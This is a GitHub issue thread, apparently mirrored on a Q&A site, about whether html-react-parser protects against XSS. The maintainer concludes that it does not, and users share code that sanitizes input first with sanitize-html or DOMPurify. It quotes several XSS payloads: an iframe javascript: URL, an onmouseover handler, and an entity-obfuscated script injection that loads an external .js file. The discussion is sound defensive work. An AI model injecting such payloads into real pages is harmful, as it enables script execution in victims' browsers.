Does html-react-parser strip out XSS?

Question

Does html-react-parser strip out XSS?

dave-stevens-net opened this issue 6 years ago · comments

I'm wanting to use html-react-parser to sanitize and parse HTML from my CMS. Does it effectively sanitize the input from XSS attacks? https://stackoverflow.com/questions/29044518/safe-alternative-to-dangerouslysetinnerhtml#answer-48261046 claims that it does. If so, I think it would be great to document / advertise this somewhere in the README. Thanks for your work on this.

Mark · Answer 1 · Sat Mar 09 2019 00:19:43 GMT+0800 (China Standard Time)

Great question @dave-stevens-net!

Unfortunately it doesn't. The reason is because I chose to make this library flexible rather than strict.

Although there is the replace option, checking against all possible attacks may be too much. I recommend instead using an XSS sanitizer with dangerouslySetInnerHTML.

Dave Stevens · Answer 2 · Sat Mar 09 2019 00:23:01 GMT+0800 (China Standard Time)

Good to know. Thanks for the quick response.

Mark · Answer 3 · Sat Mar 09 2019 00:26:58 GMT+0800 (China Standard Time)

You're very welcome. If this answers your question @dave-stevens-net, can the issue be closed?

Mark · Answer 4 · Sun Mar 10 2019 02:23:33 GMT+0800 (China Standard Time)

@dave-stevens-net I may have misspoke earlier about this library not being XSS safe.

I originally thought this library wasn't XSS-safe because dangerouslySetInnerHTML was relied here.

However, it seems that I'm unable to reproduce any XSS vulnerabilities. See my fiddle, which is based off of this example.

Let me know if you have any luck in reproducing XSS attacks.

Harvey Forero · Answer 5 · Wed Mar 13 2019 21:35:07 GMT+0800 (China Standard Time)

I managed to reproduce a simple XSS attack. There might be more.

Check my fiddle.

I found it in here https://www.in-secure.org/misc/xss/xss.html

Dave Stevens · Answer 6 · Wed Mar 13 2019 21:43:07 GMT+0800 (China Standard Time)

I ended up coding a Sanitize component using the sanitize-html package dependency.

import React from 'react'
import sanitizeHtml from 'sanitize-html'

const Sanitize = ({ html }) => {
    const clean = sanitizeHtml(html, {
        allowedTags: sanitizeHtml.defaults.allowedTags.concat(['img', 'span']),
        allowedAttributes: {
           ...
        },
    })
    return (
        <span
            className="sanitized-html"
            dangerouslySetInnerHTML={{ __html: clean }}
        />
    )
}
export default Sanitize

Example usage:

<Sanitize html={data.wordpressPage.title} />

Mark · Answer 7 · Thu Mar 14 2019 07:21:19 GMT+0800 (China Standard Time)

@harveydf Great find! Thanks for creating and sharing the fiddle.

I'll update the README.md to note that this library isn't XSS safe.

Christian Nikkanen · Answer 8 · Tue Jul 09 2019 23:02:02 GMT+0800 (China Standard Time)

I didn't want to use sanitize-html, because it's massive. I used dompurify instead, it's 10 times smaller, and doesn't remove CSS.

import parse, { domToReact } from 'html-react-parser'
import DOMPurify from 'dompurify'
import React from 'react'

// export function replaceNode() {}

export default function html(html, opts = {}) {
  return parse(DOMPurify.sanitize(html), {
    ...{
      replace: replaceNode,
    },
    ...opts,
  })
}

html('<iframe src=javascript:alert("xss")></iframe>')

Mark · Answer 9 · Sun Jul 14 2019 09:05:33 GMT+0800 (China Standard Time)

Thanks for sharing your approach using dompurify @k1sul1!

I created a Repl.it demo based on your example.

xkcdstickfigure · Answer 10 · Thu Oct 26 2023 01:16:03 GMT+0800 (China Standard Time)

I managed to reproduce a simple XSS attack. There might be more.

Check my fiddle.

I found it in here https://www.in-secure.org/misc/xss/xss.html

Hey I know this is a pretty old comment but I just wanted to point out that this isn't actually an XSS issue since the JavaScript is running within the iframe. If you change the html to <iframe src=javascript:alert(location.href)></iframe>, you'll see that the URL it's running on is about:blank rather than the host page.

Alex Gleason · Answer 11 · Thu Feb 08 2024 11:26:03 GMT+0800 (China Standard Time)

In the replace function, you can check domNode.name... so wouldn't it be inherently not possible to embed a script tag or iframe there if you just check if (['script', 'iframe'].includes(domNode.name)) return null ?

Mark · Answer 12 · Thu Feb 08 2024 12:37:58 GMT+0800 (China Standard Time)

@alexgleason there are many other ways to do XSS without <script> or <iframe>. For example:

<a onmouseover="alert()">xss</a>

Take a look at https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html

Alex Gleason · Answer 13 · Thu Feb 08 2024 12:51:57 GMT+0800 (China Standard Time)

Ahh... that makes sense.

What I'm really trying to figure out is if this library is any worse than dangerouslySetInnerHTML. Is there a new attack surface outside of what's already possible with dangerouslySetInnerHTML?

Mark · Answer 14 · Fri Feb 09 2024 00:18:33 GMT+0800 (China Standard Time)

@alexgleason you should treat this library the same as dangerouslySetInnerHTML if you didn't sanitize the HTML string

Alex Gleason · Answer 15 · Fri Feb 09 2024 03:59:39 GMT+0800 (China Standard Time)

Thank you for clarifying. A friend of mine got burned by this one earlier this year, so now I am extra paranoid:

@graf does btrfly support pleroma <a href='https://github.com/r/nd&#x61t&#x61:text/html,<scr&#x69pt></scr&#x69pt\" target="_blank" rel="nofollow" src=\"https://i.poastcdn.org/b2977f2d97f598d2ebd6dcf37afd9047b5da2b6dc95a7b2824fb111c906fb117.js\" hidden'></a>

Fortunately I can't reproduce the attack using this library. I just gave it a try.

They were using a custom HTML parser that was vulnerable. This library seems to use the browser's DOMParser when it's availble. Therefore, I conclude it's no less secure than using dangerouslySetInnerHTML directly.